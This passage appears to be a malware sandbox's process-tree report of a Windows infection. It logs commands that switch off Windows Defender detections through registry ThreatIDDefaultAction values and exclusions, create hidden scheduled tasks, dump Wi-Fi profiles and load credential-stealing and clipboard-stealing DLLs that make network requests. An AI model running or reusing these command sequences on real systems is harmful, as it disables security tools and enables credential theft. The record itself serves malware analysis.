C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force9⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force10⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"6⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 15:54:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSB7D2.tmp\Install.exe\" Wt /aVWdidKPsl 385118 /S" /V1 /F6⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn biPxHmULFllsbMgnpt7⤵
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn biPxHmULFllsbMgnpt8⤵
-
C:\Users\Admin\Pictures\36y0Ywm7mT9F0RMTmnGvTs2k.exe"C:\Users\Admin\Pictures\36y0Ywm7mT9F0RMTmnGvTs2k.exe" --silent --allusers=04⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
-
C:\Users\Admin\Pictures\36y0Ywm7mT9F0RMTmnGvTs2k.exeC:\Users\Admin\Pictures\36y0Ywm7mT9F0RMTmnGvTs2k.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6bd1e1d0,0x6bd1e1dc,0x6bd1e1e85⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\36y0Ywm7mT9F0RMTmnGvTs2k.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\36y0Ywm7mT9F0RMTmnGvTs2k.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\Pictures\36y0Ywm7mT9F0RMTmnGvTs2k.exe"C:\Users\Admin\Pictures\36y0Ywm7mT9F0RMTmnGvTs2k.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4648 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240428155250" --session-guid=cbcc7ac2-ab91-4673-88dc-3da3085ddca0 --server-tracking-blob="ODdjZGRlZDFjZmZhNjU0YzU3NjA1NTYzOGQzNDQyZjhhMzJiZTJhYmZhMTliMGZhNDBjZDUzZGNjZTdjZmYwOTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTEiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzE0MzE5NTM3LjMxMjQiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiYjliOWYxMzMtOTliZS00ODViLWJjMmYtODA2Njc2NThiMWM1In0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=74050000000000005⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
-
C:\Users\Admin\Pictures\36y0Ywm7mT9F0RMTmnGvTs2k.exeC:\Users\Admin\Pictures\36y0Ywm7mT9F0RMTmnGvTs2k.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2bc,0x2c0,0x2c4,0x28c,0x2c8,0x6986e1d0,0x6986e1dc,0x6986e1e86⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281552501\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281552501\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281552501\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281552501\assistant\assistant_installer.exe" --version5⤵
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281552501\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281552501\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0x2a6038,0x2a6044,0x2a60506⤵
-
C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe"C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mstc.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\explorer.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Admin\AppData\Roaming\explorer.exe"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main2⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\696768468217_Desktop.zip' -CompressionLevel Optimal4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main2⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1856 -ip 18561⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 1832 -ip 18321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 3472 -ip 34721⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSB7D2.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zSB7D2.tmp\Install.exe Wt /aVWdidKPsl 385118 /S1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
